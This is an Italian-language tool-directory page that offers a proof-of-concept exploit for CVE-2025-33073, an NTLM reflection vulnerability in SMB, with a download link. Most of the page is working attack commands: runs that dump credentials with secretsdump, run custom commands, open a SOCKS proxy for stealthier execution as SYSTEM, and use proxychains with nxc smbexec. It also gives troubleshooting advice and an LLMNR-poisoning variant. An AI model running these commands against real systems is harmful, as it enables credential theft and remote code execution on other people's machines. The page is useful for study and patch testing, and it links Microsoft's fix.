Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-33073 — PoC Exploit per la vulnerabilità SMB di riflessione NTLM. | Kitploit
Strumenti/GitHubGitHub/starscow/cve-2025-33073
Analisi delle VulnerabilitàExploitMovimento LateralePost-ExploitPenetration TestingRed Teaming
GitHubstarscow/cve-2025-33073

CVE-2025-33073

PoC Exploit per la vulnerabilità SMB di riflessione NTLM.

Vedi Repository
11 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-33073

PoC Exploit per la vulnerabilità SMB di riflessione NTLM.

Tutti i crediti vanno alla ricerca ufficiale:
https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025

Prerequisiti

Sistema operativo: Kali Linux (ha la maggior parte dei pacchetti preinstallati).

  • NetExec (NXC) - https://github.com/Pennyw0rth/NetExec
  • impacket-ntlmrelayx
  • dnstool.py (incluso nel repository)
  • xterm (solo per GUI)

Esempio di utilizzo

GUI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65

image

CLI

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only

image

Comando personalizzato
Invece di eseguire secretsdump, è possibile eseguire un comando personalizzato.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target CLIENT01.wintastic.local --target-ip 192.168.178.65 --cli-only --custom-command "whoami"

image

SOCKS
Per un'esecuzione più furtiva dei comandi dopo che è stata stabilita una connessione valida come SYSTEM. --target e --target-ip devono essere uguali qui.

root@kitploit:~
python3 CVE-2025-33073.py -u 'wintastic.local\mathijs' -p 'password' --attacker-ip 192.168.178.49 --dns-ip 192.168.178.138 --dc-fqdn DC01.wintastic.local --target 192.168.178.65 --target-ip 192.168.178.65 --cli-only --socks

image È inoltre possibile eseguire un comando personalizzato tramite proxychains invece di estrarre il SAM.

root@kitploit:~
proxychains nxc smb 192.168.178.65 -d '' -u '' -p '' -x 'whoami' --exec-method smbexec

image

Exploit manuale senza requisito DNS

Se ti trovi nello stesso dominio di broadcast del dispositivo ed è vulnerabile all'avvelenamento LLMNR, è possibile sfruttare un dispositivo senza dover registrare un record DNS.

image

Risoluzione dei problemi

  • Ho visto che l'attacco a volte non funziona perché viene utilizzato il nome host per l'attacco, il che comporta una ricerca DNS da parte di Kali. Se Kali non utilizza il server DNS o ricevi un messaggio '/ FAILED' da impacket-ntlmrelayx, prova ad aggiungere l'host al tuo file /etc/hosts. Questo dovrebbe far funzionare l'attacco.
  • Se si utilizza l'IP, l'attacco dovrebbe funzionare. A volte eseguirlo più volte risulta in un SUCCESS invece di un fallimento. Fino ad ora non è del tutto chiaro perché ciò accada. Penso che abbia qualcosa a che fare con la rete.
  • Prova un altro metodo di coerce usando -M o --method.

Wireshark

L'autenticazione NTLM locale avviene image

L'autenticazione NTLM locale non avviene, risultando in un tentativo FALLITO image

Buono a sapersi

  • xterm consente di copiare e incollare con il tasto centrale del mouse.
  • Il record DNS dovrebbe essere noto anche al client; in alcuni casi questo può richiedere più tempo. Con più tempo intendo concedere un paio di minuti.
  • Questo è solo un PoC, il che significa che non sono stati tentati bypass di AV/EDR. Utilizzo a proprio rischio.

Come risolvere

https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2025-33073

Scarica lo strumento